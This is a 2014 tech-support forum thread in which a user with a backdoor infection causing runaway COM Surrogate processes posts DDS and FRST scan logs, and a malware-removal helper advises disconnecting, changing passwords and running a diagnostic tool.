Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Multiple processes of dllhost.exe-COM Surrogate Backdoor.OAccess


  • This topic is locked This topic is locked
18 replies to this topic

#1 padjr

padjr

  • Members
  • 19 posts
  • OFFLINE
  •  
  • Local time:09:05 AM

Posted 18 October 2014 - 03:46 PM

Just switched to high speed cable and four days in I've already got a problem. I think it hit the 15th or 16th.  It is triggered when I open a folder or start IE. I can see conhost.exe flash in Task Manager followed by multiple processes of dllhost.exe-COM Surrogate, it will open several, eating up processor but more concerning I can see it eating bandwidth as well. Also any open folder shows a green progress bar at the top like it is indexing or something. I can END all the dllhost.exe-COM Surrogates in Task Manager but they return when I open a folder or start IE again, also IE keeps resetting the 'File Download' in security to 'Disable'. I can change it and get files downloaded but the next time I open IE it's set back to disable.

 

I have managed to download and run rkill, TDSSKiller and RogueKiller. I was able to make several passes with Spybot and Malwarebyts (finding Trojan.Sirede.C and Backdoor.OAccess among other things) until they no longer found any more. I thought I had it fixed but the COM Surrogate came right back.

 

Just now for the first time I got a message saying 'COM Surrogate has stopped working, end program?'

 

I could use some help rooting this the rest of the way out.

 

Thanks

--------------------------------------

DDS (Ver_2012-11-20.01) - NTFS_AMD64

 

Internet Explorer: 9.0.8112.16526  BrowserJavaVersion: 10.25.2

 

Run by JP at 15:20:12 on 2014-10-18

 

Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.12279.9410 [GMT -5:00]

 

.

 

AV: AVG AntiVirus 2013 *Enabled/Updated* {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}

 

SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

 

SP: Spybot - Search and Destroy *Disabled/Updated* {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}

 

SP: AVG AntiVirus 2013 *Enabled/Updated* {B5F5C120-2089-702E-0001-553BB0D5A664}

 

.

 

============== Running Processes ===============

 

.

 

C:\PROGRA~2\AVG\AVG2013\avgrsa.exe

 

C:\Program Files (x86)\AVG\AVG2013\avgcsrva.exe

 

C:\Windows\system32\lsm.exe

 

C:\Windows\system32\svchost.exe -k DcomLaunch

 

C:\Windows\system32\nvvsvc.exe

 

C:\Windows\system32\svchost.exe -k RPCSS

 

C:\Windows\system32\atiesrxx.exe

 

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

 

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted

 

C:\Windows\system32\svchost.exe -k LocalService

 

C:\Windows\system32\svchost.exe -k netsvcs

 

C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe

 

C:\Windows\system32\svchost.exe -k NetworkService

 

C:\Windows\system32\atieclxx.exe

 

C:\Windows\System32\spoolsv.exe

 

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork

 

C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVine.exe

 

C:\Program Files (x86)\Adobe\Elements 10 Organizer\PhotoshopElementsFileAgent.exe

 

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

 

C:\Program Files (x86)\Single Video Surveillance Client\AntsCMSService.exe

 

C:\Program Files (x86)\Single Video Surveillance Client\AntsSTSService.exe

 

C:\Program Files (x86)\AVG\AVG2013\avgidsagent.exe

 

C:\Program Files (x86)\AVG\AVG2013\avgwdsvc.exe

 

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation

 

C:\Program Files (x86)\Hewlett-Packard\HP Easy Backup\HPBtnSrv.exe

 

C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe

 

C:\Program Files\MySQL\MySQL Server 5.1\bin\mysqld.exe

 

C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneService.exe

 

C:\Windows\system32\taskhost.exe

 

C:\Windows\system32\Dwm.exe

 

C:\Windows\Explorer.EXE

 

C:\Windows\system32\taskeng.exe

 

C:\Program Files (x86)\AVG\AVG2013\avgnsa.exe

 

C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneCmd.exe

 

C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe

 

C:\Program Files\Canon\MyPrinter\BJMYPRT.EXE

 

C:\Program Files\Windows Sidebar\sidebar.exe

 

C:\Program Files (x86)\DAP\DAP.exe

 

C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe

 

C:\Program Files\Core Temp\Core Temp.exe

 

C:\Windows\system32\taskeng.exe

 

c:\Program Files (x86)\Hewlett-Packard\Media\DVD\DVDAgent.exe

 

c:\Program Files (x86)\Hewlett-Packard\TouchSmart\Media\Kernel\CLML\CLMLSvc.exe

 

C:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe

 

C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe

 

C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVineManager.exe

 

C:\Program Files (x86)\hp\HP Software Update\hpwuschd2.exe

 

C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\RIMBBLaunchAgent.exe

 

C:\Windows\SysWOW64\Ctxfihlp.exe

 

C:\Windows\system32\svchost.exe -k imgsvc

 

C:\Program Files (x86)\Novatel Wireless\LTE Support\VZWMSConfig.exe

 

C:\Program Files (x86)\Canon\Solution Menu EX\CNSEMAIN.EXE

 

C:\Program Files (x86)\AVG\AVG2013\avgcsrva.exe

 

C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe

 

C:\Program Files (x86)\AVG\AVG2013\avgui.exe

 

C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe

 

C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe

 

C:\Windows\splwow64.exe

 

C:\Windows\system32\SearchIndexer.exe

 

C:\Windows\SysWOW64\CTXFISPI.EXE

 

C:\Windows\system32\taskmgr.exe

 

C:\Windows\System32\WUDFHost.exe

 

C:\Program Files\Windows Media Player\wmpnetwk.exe

 

C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe

 

C:\Windows\System32\svchost.exe -k LocalServicePeerNet

 

C:\Windows\System32\WUDFHost.exe

 

C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe

 

C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe

 

C:\Program Files (x86)\Internet Explorer\iexplore.exe

 

C:\Program Files (x86)\Internet Explorer\iexplore.exe

 

C:\Program Files (x86)\Internet Explorer\iexplore.exe

 

C:\Windows\syswow64\dllhost.exe

 

C:\Windows\system32\wbem\wmiprvse.exe

 

C:\Windows\System32\cscript.exe

 

.

 

============== Pseudo HJT Report ===============

 

.

 

uStart Page = hxxps://duckduckgo.com/

 

dURLSearchHooks: {A3BC75A2-1F87-4686-AA43-5347D756017C} - <orphaned>

 

BHO: Groove GFS Browser Helper: {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll

 

BHO: Java™ Plug-In SSV Helper: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll

 

BHO: Windows Live Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll

 

BHO: Microsoft Live Search Toolbar Helper: {d2ce3e00-f94a-4740-988e-03dc2f38c34f} - c:\Program Files (x86)\MSN\Toolbar\3.0.0560.0\msneshellx.dll

 

BHO: SpeedBit Link Verification Helper: {D5974A72-C81C-4DC3-BE77-A8A7BBC8864E} - C:\Program Files (x86)\DAP\LinkVerifier.dll

 

BHO: Java™ Plug-In 2 SSV Helper: {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll

 

BHO: {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - <orphaned>

 

TB: Microsoft Live Search Toolbar: {1E61ED7C-7CB8-49d6-B9E9-AB4C880C8414} - c:\Program Files (x86)\MSN\Toolbar\3.0.0560.0\msneshellx.dll

 

uRun: [SpybotSD TeaTimer] C:\Program Files (x86)\Spybot - Search & Destroy\TeaTimer.exe

 

uRun: [SansaDispatch] C:\Users\JP\AppData\Roaming\SanDisk\Sansa Updater\SansaDispatch.exe

 

uRun: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun

 

uRun: [DownloadAccelerator] "C:\Program Files (x86)\DAP\DAP.EXE" /STARTUP

 

mRun: [hpsysdrv] c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe

 

mRun: [UpdatePRCShortCut] "C:\Program Files (x86)\Hewlett-Packard\Recovery\MUITransfer\MUIStartMenu.exe" "C:\Program Files (x86)\Hewlett-Packard\Recovery" UpdateWithCreateOnce "Software\CyberLink\PowerRecover"

 

mRun: [IAStorIcon] C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe

 

mRun: [57xxSteelVine] C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVineManager.exe

 

mRun: [HP Software Update] C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe

 

mRun: [RIMBBLaunchAgent.exe] C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\RIMBBLaunchAgent.exe

 

mRun: [AMD AVT] Cmd.exe /c start "AMD Accelerated Video Transcoding device initialization" /min "C:\Program Files (x86)\AMD AVT\bin\kdbsync.exe" aml

 

mRun: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun

 

mRun: [CTxfiHlp] CTXFIHLP.EXE

 

mRun: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"

 

mRun: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"

 

mRun: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime

 

mRun: [CanonSolutionMenuEx] C:\Program Files (x86)\Canon\Solution Menu EX\CNSEMAIN.EXE /logon

 

mRun: [AVG_UI] "C:\Program Files (x86)\AVG\AVG2013\avgui.exe" /TRAYONLY

 

mRun: [SDTray] "C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe"

 

StartupFolder: C:\Users\JP\AppData\Roaming\MICROS~1\Windows\STARTM~1\Programs\Startup\CORETE~1.LNK - C:\Program Files\Core Temp\Core Temp.exe

 

uPolicies-Explorer: NoDriveTypeAutoRun = dword:145

 

uPolicies-Explorer: HideSCAHealth = dword:1

 

mPolicies-Explorer: NoActiveDesktop = dword:1

 

mPolicies-System: ConsentPromptBehaviorAdmin = dword:0

 

mPolicies-System: ConsentPromptBehaviorUser = dword:3

 

mPolicies-System: EnableLUA = dword:0

 

mPolicies-System: EnableUIADesktopToggle = dword:0

 

mPolicies-System: PromptOnSecureDesktop = dword:0

 

IE: &Download with &DAP - C:\Program Files (x86)\DAP\dapextie.htm

 

IE: &Verify with DAP - C:\Program Files (x86)\DAP\dapverify.htm

 

IE: Download &all with DAP - C:\Program Files (x86)\DAP\dapextie2.htm

 

IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~2\Office12\EXCEL.EXE/3000

 

IE: {25510184-5A38-4A99-B273-DCA8EEF6CD08} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\NCLauncherFromIE.exe

 

IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - C:\Program Files (x86)\Microsoft Office\Office12\ONBttnIE.dll

 

IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}

 

.

 

INFO: HKCU has more than 50 listed domains.

 

If you wish to scan all of them, select the 'Force scan all domains' option.

 

.

 

.

 

INFO: HKLM has more than 50 listed domains.

 

   If you wish to scan all of them, select the 'Force scan all domains' option.

 

.

 

DPF: {17492023-C23A-453E-A040-C7C580BBF700} - hxxp://download.microsoft.com/download/C/0/C/C0CBBA88-A6F2-48D9-9B0E-1719D1177202/LegitCheckControl.cab

 

DPF: {D4B68B83-8710-488B-A692-D74B50BA558E} - hxxp://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab

 

DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} - hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab

 

DPF: {E705A591-DA3C-4228-B0D5-A356DBA42FBF} - hxxp://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab

 

DPF: {F27237D7-93C8-44C2-AC6E-D6057B9A918F} - hxxps://employee.bnsf.com/dana-cached/sc/JuniperSetupClient.cab

 

DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} - hxxp://ccfiles.creative.com/Web/softwareupdate/ocx/110926/CTPID.cab

 

DPF: {FA5D9BCA-4653-49FB-9237-FFA947877414} - hxxp://192.168.1.10/ZDVR.CAB

 

TCP: NameServer = 8.8.8.8 24.178.162.3 24.247.15.53

 

TCP: Interfaces\{00CC7F36-8FA0-4ED7-B2E6-6583421FF144} : DHCPNameServer = 8.8.8.8 24.178.162.3 24.247.15.53

 

TCP: Interfaces\{50DE2186-268E-495B-9600-CFC75911AA10} : DHCPNameServer = 192.168.1.1

 

Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveSystemServices.dll

 

Name-Space Handler: ftp\ZDA - {5BFA1DAF-5EDC-11D2-959E-00C00C02DA5E} - C:\Program Files (x86)\DAP\dapie.dll

 

Name-Space Handler: http\ZDA - {5BFA1DAF-5EDC-11D2-959E-00C00C02DA5E} - C:\Program Files (x86)\DAP\dapie.dll

 

Notify: SDWinLogon - SDWinLogon.dll

 

SSODL: WebCheck - <orphaned>

 

SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll

 

mASetup: {10880D85-AAD9-4558-ABDC-2AB1552D831F} - "C:\Program Files (x86)\Common Files\LightScribe\LSRunOnce.exe"

 

x64-BHO: {DBC80044-A445-435b-BC74-9C25C1C588A9} - <orphaned>

 

x64-Run: [SmartMenu] C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe /background

 

x64-Run: [AdobeAAMUpdater-1.0] "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"

 

x64-Run: [CanonMyPrinter] C:\Program Files\Canon\MyPrinter\BJMyPrt.exe /logon

 

.

 

INFO: x64-HKLM has more than 50 listed domains.

 

   If you wish to scan all of them, select the 'Force scan all domains' option.

 

.

 

x64-Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - <orphaned>

 

x64-Name-Space Handler: ftp\ZDA - {5BFA1DAF-5EDC-11D2-959E-00C00C02DA5E} - C:\Program Files (x86)\DAP\dapie64.dll

 

x64-Name-Space Handler: http\ZDA - {5BFA1DAF-5EDC-11D2-959E-00C00C02DA5E} - C:\Program Files (x86)\DAP\dapie64.dll

 

x64-SSODL: WebCheck - <orphaned>

 

x64-mASetup: {12d0ed0d-0ee0-4f90-8827-78cefb8f4988} - C:\Windows\System32\ieudinit.exe

 

.

 

============= SERVICES / DRIVERS ===============

 

.

 

R0 AVGIDSHA;AVGIDSHA;C:\Windows\System32\drivers\avgidsha.sys [2013-7-20 71480]

 

R0 Avgloga;AVG Logging Driver;C:\Windows\System32\drivers\avgloga.sys [2013-7-20 311608]

 

R0 Avgmfx64;AVG Mini-Filter Resident Anti-Virus Shield;C:\Windows\System32\drivers\avgmfx64.sys [2013-7-1 116536]

 

R0 Avgrkx64;AVG Anti-Rootkit Driver;C:\Windows\System32\drivers\avgrkx64.sys [2013-10-23 45880]

 

R0 PxHlpa64;PxHlpa64;C:\Windows\System32\drivers\PxHlpa64.sys [2012-2-29 55856]

 

R1 AVGIDSDriver;AVGIDSDriver;C:\Windows\System32\drivers\avgidsdrivera.sys [2013-11-25 246072]

 

R1 Avgldx64;AVG AVI Loader Driver;C:\Windows\System32\drivers\avgldx64.sys [2013-7-20 206648]

 

R1 Avgtdia;AVG TDI Driver;C:\Windows\System32\drivers\avgtdia.sys [2014-4-15 240952]

 

R2 57xx SteelVine Manager;57xx SteelVine;C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVine.exe [2007-8-20 1282048]

 

R2 AdobeActiveFileMonitor10.0;Adobe Active File Monitor V10;C:\Program Files (x86)\Adobe\Elements 10 Organizer\PhotoshopElementsFileAgent.exe [2011-9-1 169624]

 

R2 AMD External Events Utility;AMD External Events Utility;C:\Windows\System32\atiesrxx.exe [2012-4-5 236544]

 

R2 AntsCMSService;AntsCMSService;C:\Program Files (x86)\Single Video Surveillance Client\AntsCMSService.exe [2014-5-18 2403328]

 

R2 AntsSTSService;AntsSTSService;C:\Program Files (x86)\Single Video Surveillance Client\AntsSTSService.exe [2014-5-18 2038784]

 

R2 AVGIDSAgent;AVGIDSAgent;C:\Program Files (x86)\AVG\AVG2013\avgidsagent.exe [2013-7-4 4939312]

 

R2 avgwd;AVG WatchDog;C:\Program Files (x86)\AVG\AVG2013\avgwdsvc.exe [2013-11-20 283136]

 

R2 HPBtnSrv;HP Easy Backup Button Service;C:\Program Files (x86)\Hewlett-Packard\HP Easy Backup\HPBtnSrv.exe [2009-12-3 192512]

 

R2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [2010-6-11 13336]

 

R2 SDUpdateService;Spybot-S&D 2 Updating Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2014-10-17 2088408]

 

R2 SDWSCService;Spybot-S&D 2 Security Center Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [2014-10-17 171928]

 

R2 VZWConfigService;VZW Config Service;C:\Program Files (x86)\Novatel Wireless\LTE Support\VZWMSConfig.exe [2012-4-16 218160]

 

R3 CT20XUT.SYS;CT20XUT.SYS;C:\Windows\System32\drivers\CT20XUT.sys [2010-7-7 230488]

 

R3 CTEXFIFX.SYS;CTEXFIFX.SYS;C:\Windows\System32\drivers\CTEXFIFX.sys [2010-7-7 1445976]

 

R3 CTHWIUT.SYS;CTHWIUT.SYS;C:\Windows\System32\drivers\CTHWIUT.sys [2010-7-7 95320]

 

R3 e1yexpress;Intel® Gigabit Network Connections Driver;C:\Windows\System32\drivers\e1y62x64.sys [2009-12-3 287960]

 

R3 ha20x22k;Creative 20X2 HAL Driver;C:\Windows\System32\drivers\ha20x22k.sys [2010-7-7 1612888]

 

R3 nvoclk64;NVIDIA Enthusiasts Platform KDM;C:\Windows\System32\drivers\nvoclk64.sys [2009-9-15 42088]

 

R3 nwusbserial;Novatel Wireless VCOM Port;C:\Windows\System32\drivers\nwvcomnet64.sys [2012-9-27 37888]

 

R3 PPorts;PCIe ECP Parallel Port;C:\Windows\System32\drivers\PPorts.sys [2009-7-23 95744]

 

S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]

 

S2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [2010-3-18 138576]

 

S2 SDScannerService;Spybot-S&D 2 Scanner Service;C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [2014-10-17 1738168]

 

S3 AtiHDAudioService;AMD Function Driver for HD Audio Service;C:\Windows\System32\drivers\AtihdW76.sys [2013-2-14 96768]

 

S3 Creative ALchemy AL6 Licensing Service;Creative ALchemy AL6 Licensing Service;C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\AL6Licensing.exe [2012-8-2 79360]

 

S3 Creative Audio Engine Licensing Service;Creative Audio Engine Licensing Service;C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\CTAELicensing.exe [2012-8-2 79360]

 

S3 Creative Media Toolbox 6 Licensing Service;Creative Media Toolbox 6 Licensing Service;C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\MT6Licensing.exe [2012-8-2 79360]

 

S3 CT20XUT;CT20XUT;C:\Windows\System32\drivers\CT20XUT.sys [2010-7-7 230488]

 

S3 CTEXFIFX;CTEXFIFX;C:\Windows\System32\drivers\CTEXFIFX.sys [2010-7-7 1445976]

 

S3 CTHWIUT;CTHWIUT;C:\Windows\System32\drivers\CTHWIUT.sys [2010-7-7 95320]

 

S3 NwGPSOverWiFi64;Novatel GPSOverWiFi Virtual Serial Port;C:\Windows\System32\drivers\nwvcomnet64.sys [2012-9-27 37888]

 

S3 NWUSBLAN_4620;Novatel Wireless 4620 Ethernet Adapter;C:\Windows\System32\drivers\nwblan_4620.sys [2012-9-27 47472]

 

S3 PCDSRVC{F36B3A4C-F95654BD-06000000}_0;PCDSRVC{F36B3A4C-F95654BD-06000000}_0 - PCDR Kernel Mode Service Helper Driver;C:\Program Files\PC-Doctor for Windows\pcdsrvc_x64.pkms [2009-6-10 23536]

 

S3 RivaTuner64;RivaTuner64;C:\Program Files (x86)\RivaTuner v2.24 MSI Master Overclocking Arena 2009 edition\RivaTuner64.sys [2009-8-22 19952]

 

S3 Ser2ph;Microsoft USB GPS driver;C:\Windows\System32\drivers\ser2ph64.sys [2008-3-6 89600]

 

S3 StorSvc;Storage Service;C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted [2009-7-13 27136]

 

S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2011-8-18 59392]

 

S3 WatAdminSvc;Windows Activation Technologies Service;C:\Windows\System32\Wat\WatAdminSvc.exe [2011-8-18 1255736]

 

.

 

=============== Created Last 30 ================

 

.

 

2014-10-18 05:12:35 -------- d-----w- C:\Users\JP\AppData\Local\CrashDumps

 

2014-10-18 03:42:54 21040 ----a-w- C:\Windows\System32\sdnclean64.exe

 

2014-10-18 03:42:49 -------- d-----w- C:\Program Files (x86)\Spybot - Search & Destroy 2

 

2014-10-18 03:16:30 34808 ----a-w- C:\Windows\System32\drivers\TrueSight.sys

 

2014-10-18 03:16:28 -------- d-----w- C:\ProgramData\RogueKiller

 

2014-10-18 00:48:11 122584 ----a-w- C:\Windows\System32\drivers\MBAMSwissArmy.sys

 

2014-10-18 00:47:56 91352 ----a-w- C:\Windows\System32\drivers\mbamchameleon.sys

 

2014-10-18 00:47:56 63704 ----a-w- C:\Windows\System32\drivers\mwac.sys

 

2014-10-18 00:47:56 -------- d-----w- C:\Program Files (x86)\Malwarebytes Anti-Malware

 

.

 

==================== Find3M  ====================

 

.

 

2014-09-24 08:36:11 71344 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl

 

2014-09-24 08:36:11 701104 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe

 

2005-05-13 23:12:00 217073 --sha-r- C:\Windows\meta4.exe

 

2005-10-24 17:13:58 66560 --sha-r- C:\Windows\MOTA113.exe

 

2005-10-14 03:27:00 422400 --sha-r- C:\Windows\x2.64.exe

 

2005-10-08 01:14:52 308224 --sha-r- C:\Windows\SysWOW64\avisynth.dll

 

2005-07-14 18:31:20 27648 --sha-r- C:\Windows\SysWOW64\AVSredirect.dll

 

2005-06-26 21:32:28 616448 --sha-r- C:\Windows\SysWOW64\cygwin1.dll

 

2005-06-22 04:37:42 45568 --sha-r- C:\Windows\SysWOW64\cygz.dll

 

2004-01-25 06:00:00 70656 --sha-r- C:\Windows\SysWOW64\i420vfw.dll

 

2006-04-27 16:24:24 2945024 --sha-r- C:\Windows\SysWOW64\Smab.dll

 

2005-02-28 19:16:22 240128 --sha-r- C:\Windows\SysWOW64\x.264.exe

 

2004-01-25 06:00:00 70656 --sha-r- C:\Windows\SysWOW64\yv12vfw.dll

 

.

 

============= FINISH: 15:21:16.22 ===============

 

Attached Files



BC AdBot (Login to Remove)

 


#2 Machiavelli

Machiavelli

    Agent 007


  • Malware Response Instructor
  • 4,087 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Germany
  • Local time:10:05 AM

Posted 19 October 2014 - 02:10 PM

I have managed to download and run rkill, TDSSKiller and RogueKiller.

I need the logs ...

 

In your logs I see a Backdoor. That means that your machine is infected with some nasty files which can steal some information. It is difficult to tell whether or not any data has been stolen and finding out which is true instead of doing countermeasures is unproductive. In this light, for your safety, assume that your log-in details and other information have been accessed by another source.
Below are the steps that you should administer:
  • Please disconnect from the Internet! Also don't use it while we are cleaning the infected machine. This is especially true when you are using the computer in question for online banking and other sites that require sensitive and personal information.
  • It is strongly advised that you change your passwords on a clean PC and notify the bank immediately to watch out for suspicious transactions.
I can try to clean the infection but I have to say your computer is very likely compromised and that there is no way to be sure your computer can ever again be trusted.Experts in the security community believe that a reformat and re-installation of the operating system is the best solution. Please peruse the following if you would like to know more:Now - you decide if you want to reformat the PC or to cleaning the PC. Think of it and choose the best solution for you! Let me know of your decision. If you decide to go through the proceed, please proceed with the following steps.

 

Please download FRST (by Farbar) from the link below and save it to your Desktop.

Download Mirror #1

If you are unsure whether you have 32-Bit or 64-Bit Windows, see here
  • Disable all anti-virus and anti-malware software to prevent them inhibiting FRST in any way. If you are unsure how to do this, see THIS.
  • Double-click FRST.exe/FRST64.exe (depending on which version you downloaded) to run it. (if you have Windows Vista / Windows 7 / Windows 8: Please do a Right click on the FRST icon and select Run as Administrator)
  • When the disclaimer appears, click Yes.
  • Click Scan to start FRST.
  • When FRST finishes scanning, two logs, FRST.txt and Addition.txt will open.
  • Copy (Ctrl+C) and Paste (Ctrl+V) the contents of both of these logs into your next post please.

~Machiavelli

If I don't reply within 24 hours please PM me!

  • Every topic with no replies within 5 days will be closed.
  • If you like my help here please give me feedback.

unite_blue.png
 
 


#3 padjr

padjr
  • Topic Starter

  • Members
  • 19 posts
  • OFFLINE
  •  
  • Local time:09:05 AM

Posted 20 October 2014 - 09:22 AM

I don't do online banking or bill paying, just some shopping and streaming and other stuff.  I'd be bringing a lot of saved stuff into the new build, Favorites, Address book and PST files.  I'd like to try to clean it first if possible. Here are the logs.

Thanks

Jim

--------------------------------------

 

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 16-10-2014
Ran by JP (administrator) on JIM-PC on 20-10-2014 09:09:15
Running from E:\
Loaded Profile: JP (Available profiles: JP & JR)
Platform: Windows 7 Professional Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(NVIDIA Corporation) C:\Windows\System32\nvvsvc.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(Creative Technology Ltd) C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe
(AMD) C:\Windows\System32\atieclxx.exe
() C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVine.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Elements 10 Organizer\PhotoshopElementsFileAgent.exe
(ANTS) C:\Program Files (x86)\Single Video Surveillance Client\AntsCMSService.exe
() C:\Program Files (x86)\Single Video Surveillance Client\AntsSTSService.exe
(AVG Technologies CZ, s.r.o.) C:\Program Files (x86)\AVG\AVG2013\avgwdsvc.exe
() C:\Program Files (x86)\Hewlett-Packard\HP Easy Backup\HPBtnSrv.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe
() C:\Program Files\MySQL\MySQL Server 5.1\bin\mysqld.exe
(NVIDIA) C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneService.exe
(NVIDIA) C:\Program Files (x86)\NVIDIA Corporation\nTune\nTuneCmd.exe
() C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe
(CANON INC.) C:\Program Files\Canon\MyPrinter\BJMYPRT.EXE
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
() C:\Program Files\Core Temp\Core Temp.exe
(Novatel Wireless Inc.) C:\Program Files (x86)\Novatel Wireless\LTE Support\VZWMSConfig.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
() C:\Program Files (x86)\Silicon Image\57xx SteelVine\SteelVineManager.exe
(Hewlett-Packard) C:\Program Files (x86)\hp\HP Software Update\hpwuschd2.exe
(Research In Motion Limited) C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\RIMBBLaunchAgent.exe
(Creative Technology Ltd) C:\Windows\SysWOW64\Ctxfihlp.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
